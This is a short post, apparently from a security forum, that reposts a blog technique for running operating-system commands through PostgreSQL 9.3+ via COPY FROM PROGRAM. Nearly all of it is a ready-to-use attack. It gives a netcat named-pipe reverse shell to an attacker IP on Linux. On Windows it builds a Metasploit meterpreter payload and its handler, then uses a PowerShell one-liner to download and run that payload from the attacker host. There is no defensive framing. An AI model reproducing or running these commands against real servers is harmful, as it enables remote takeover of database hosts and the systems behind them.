Jump to content
Nytro

OS Command Execution in PostgreSQL >= 9.3

By Nytro, in Securitate web

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

OS Command Execution in PostgreSQL >= 9.3

Linux

On attacker's machine:

nc -lvp 55555

On machine with PostgreSQL:

postgres=# create table evil (a text);

postgres=# copy evil from program 'mknod backpipe p; nc 192.168.234.138 55555 0<backpipe | /bin/bash 1>backpipe';

linux.png

Getting backconnect:

netcat.png

Windows

On attacker's machine:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.234.138 LPORT=443 X > m.exe

msfconsole

use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.234.138

set LPORT 443

exploit

On machine with PostgreSQL:

postgres=# create table evil (a text);

postgres=# copy evil from program 'powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile(\"http://192.168.234.138/m.exe\", \"C:\windows\temp\m.exe\")}"';

postgres=# copy evil from program 'C:\windows\temp\m.exe';

windows_down_run.png

Getting backconnect:

meterpreter.png

Posted by dsrbr at 10:08 AM

Sursa: http://dsrbr.blogspot.ru/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...